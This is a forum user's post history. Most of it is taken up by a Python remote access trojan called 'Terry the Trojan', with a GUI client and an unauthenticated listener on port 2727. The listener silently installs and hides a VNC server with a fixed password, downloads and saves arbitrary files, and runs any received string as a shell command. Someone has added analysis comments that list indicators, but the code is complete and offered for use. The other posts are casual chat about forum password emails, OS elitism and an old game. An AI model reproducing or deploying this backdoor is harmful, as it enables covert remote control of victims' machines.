
Posts posted by DingleBerries

  1. Here is a RAT (remote access trojan) I have been working on in Python. It's not done. Download Terry the Trojan and use that as the client to send/receive data.

    from Tkinter import *
     from tkMessageBox import *
     from ScrolledText import *
     import socket
     import sys
    
     # Destination TCP port used by the client. 2727 is the default and is the
     # same port the listener script further down this page binds to.
     portvar = 2727
     try:
         # Optional command-line override of the form: /port <number>
         if sys.argv[1] == "/port":
             try:
                 portvar = int(sys.argv[2])
             except:
                 # Missing or non-numeric value after /port: keep the default.
                 portvar = 2727
     except:
         # No command-line argument at all (sys.argv[1] raises): keep the default.
         portvar = 2727
    
     def std(string):
         """Append one line of text to the output box."""
         # The output widget is created with state=DISABLED, so it is switched to
         # NORMAL only for the duration of the insert and then locked again.
         stdbox.config(state=NORMAL)
         stdbox.insert(END,"" + string + "\n")
         stdbox.config(state=DISABLED)
    
     def cnnect(var="poo"):
         """Send the command-box text to the host in the address box and show the reply.

         `var` is never read; it absorbs the event object Tk passes when the
         function is invoked through the <Return> key binding.
         """
         # A new TCP connection is opened for every command sent.
         sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
         success = 1
         try:
             sockt.connect((ipbox.get(),portvar))
         except:
             # Any connection error is reported in the output box, not raised.
             success = 0
             std("Connection to " + ipbox.get() + " on port " + str(portvar) + " failed.")
         if success == 1:
             # The command goes out as plain text: nothing in this function
             # authenticates or encrypts the exchange, so both the command and
             # the reply are readable in a packet capture of this port.
             sockt.send(cmdbox.get())
             # Only a single recv() of at most 2048 bytes is displayed; the
             # socket is not closed explicitly anywhere in this function.
             retdata = sockt.recv(2048)
             std(retdata)
     # Build the single-window Tk front end; the window title is the tool's name.
     root = Tk()
     root.title("Terry the Trojan")
     #FRAMES: one each for the target address, the command line and the output
     ipfrm = Frame(root)
     ipfrm.pack()
     cmdfrm = Frame(root)
     cmdfrm.pack()
     stdfrm = Frame(root)
     stdfrm.pack()
     #IP/Port Entry Widgets (only a host/IP field is created here; the port
     #is taken from portvar, not from the GUI)
     Label(ipfrm,text="Host/IP adress:").grid(row=1,column=1)
     ipbox = Entry(ipfrm,width=50)
     ipbox.grid(row=1,column=2)
     #Returned output widgets (read-only scrolling text area written to by std)
     stdbox = ScrolledText(stdfrm,width=70,height=20,state=DISABLED,bg="#c0c0c0",fg="#000000")
     stdbox.grid(row=1,column=1)
     #Command sending widgets: the button and the <Return> key both call cnnect
     cmdbox = Entry(cmdfrm,width=50)
     cmdbox.grid(row=1,column=1)
     Button(cmdfrm,text="Send Command",command=cnnect).grid(row=1,column=2)
     cmdbox.bind("<Return>",cnnect)
     # Hand control to the Tk event loop; nothing below this line runs until the
     # window is closed.
     root.mainloop()

    HAH shit wrong code. Ill post it in a min.

    OK HERE is the RAT, sorry about that. You should be able to tell what the commands do.

    import socket,os,sys,urllib,re,ftplib
    from time import sleep
    # Listener side of the tool, annotated for analysis. It accepts TCP
    # connections on port 2727 on every interface, reads one command of up to
    # 2048 bytes per connection and acts on it. Nothing in the loop
    # authenticates the peer or encrypts the exchange, so any host that can
    # reach the port can drive it, and commands and replies are readable in a
    # packet capture.
    # Artefacts visible in this listing that a responder can look for: a
    # listener on TCP 2727; the files update.exe, windsys.ini and file.exe in
    # the process working directory; WinVNC3 values under HKLM and HKCU
    # \SOFTWARE\ORL; outbound HTTP to the hostnames named in the branches below.
    port = 2727
    # Second socket, used only by the "ip" branch for an outbound request.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    # '' as the bind address means all local interfaces, not just loopback.
    sockt.bind(('',port))
    sockt.listen(1)
    while True:
        channel, details = sockt.accept()
        # The raw bytes received are compared against fixed command strings.
        command = channel.recv(2048)
        if command == "kill":
            # Acknowledge and terminate the listener process.
            channel.send("Server trojan has been closed.")
            sys.exit()
        elif command == "ip":
            # Outbound plain-HTTP request to a public "what is my IP" site; the
            # last whitespace-separated token of the first 2048 response bytes
            # is sent back to the peer as the address.
            connect = s.connect(("www.whatismyipaddress.com", 80))
            s.send('GET / HTTP/1.0\n\n')
            socketlines = s.recv(2048)
            lines = socketlines.split()
            ip = lines[len(lines) - 1]
            channel.send(ip)
        elif command == "whoami":
            # Host reconnaissance: these three branches return Windows
            # environment variables (user name, home drive, home path).
            channel.send(os.environ["USERNAME"])
        elif command == "drive":
            channel.send(os.environ["HOMEDRIVE"])
        elif command == "userfolder":
            channel.send(os.environ["HOMEPATH"])
        elif command == "installvnc":
            # Downloads a TightVNC installer over plain HTTP, saves it as
            # update.exe and runs it with silent-install switches.
            urllib.urlretrieve('http://downloads.sourceforge.net/vnc-tight/tightvnc-1.3.10-setup.exe','update.exe')
            fs=os.popen3('update.exe /sp- /verysilent','b')
            sleep(1)
            # Registry writes under SOFTWARE\ORL\WinVNC3 in both HKLM and HKCU:
            # a fixed Password value (the reply string at the end of this
            # branch states the password), DisableTrayIcon=1 and
            # RemoveWallpaper=0. The value names suggest the tray icon is
            # hidden and the wallpaper left in place -- confirm against the
            # VNC build in question. The popen3 results are never read.
            fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b')
            sleep(1)
            fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b')
            sleep(0.2)
            fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b')
            sleep(0.5)
            fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b')
            sleep(1)
            fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b')
            sleep(0.3)
            fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b')
            sleep(1)
            # Starts the "VNC Server" service and deletes the installer, so
            # update.exe may be gone by the time the host is examined; the
            # service and the registry values remain.
            fs=os.popen3('net start "VNC Server"','b')
            fs=os.popen3('del update.exe','b')
            channel.send("VNC was installed, password is vncserv.")
        elif command == "netstat":
            # Connection table is redirected into windsys.ini in the working
            # directory, then read back and sent. This branch does not delete
            # the file afterwards.
            fs=os.popen3('netstat -ano>windsys.ini','b')
            sleep(2)
            f = open('windsys.ini')
            channel.send(f.read())
            f.close()
        elif command == "whereami":
            # Returns the listener's current working directory.
            channel.send(os.getcwd())
        elif command.startswith("download "):
            # The command text with every "download " substring removed is
            # used as a URL; whatever it points to is written to file.exe in
            # the working directory.
            file = command.replace("download ", "")
            urllib.urlretrieve(file,"file.exe")
            channel.send("File downloaded. Saved as 'file.exe', rename extension")     
        else:
            # Fallback: any string that matched none of the names above is
            # passed unmodified to the system shell, i.e. arbitrary command
            # execution for whoever can reach the port. The command's output
            # is not read or returned; the reply only reflects whether
            # popen3 itself raised.
            csuc = 1
            try:
                fs=os.popen3(command,'b')
            except:
                csuc = 0
            if csuc == 1:
                channel.send("Command Sucessful")
            else:
                channel.send("Command Failed")
            # This is the only close() call on the accepted connection in the
            # loop; it sits inside the fallback branch.
            channel.close()

  2. I don't know of a forum software that doesn't send out *temporary* passwords in plain text. PHPBB, Simple Machines Forum and Invision Power Board all share this behaviour. If your email isn't secure, we can't help you on that front, other than suggest you look at hushmail.

    I haven't played around with phpBB, but I know other forums that send you a reset link. If anything, I'd have expected to receive a temporary password and be asked to change it. I just hope that the password I am sent is hashed in the db after it has been sent to me.

    Just saw your post, Vako. Glad they were hashed. Good luck brute-forcing the good ones.

  3. Most of the shit Matt says is a bit pointless anyways. Bashing his own users and a really use python script? He does know his servers and topography though.

    Just like the elitist Linux users, the same crowd also exists in the Mac and Windows worlds. Use what works for you and shut up. If someone asks, then inform them, give them a demo... if not, let them do what they want.

  4. Hai guise. I used to play this game. There were these options and some characters and you fought bad guys. I cant remember anything else about it, only that it was a long time ago. Can I has halp?

    70915444.png
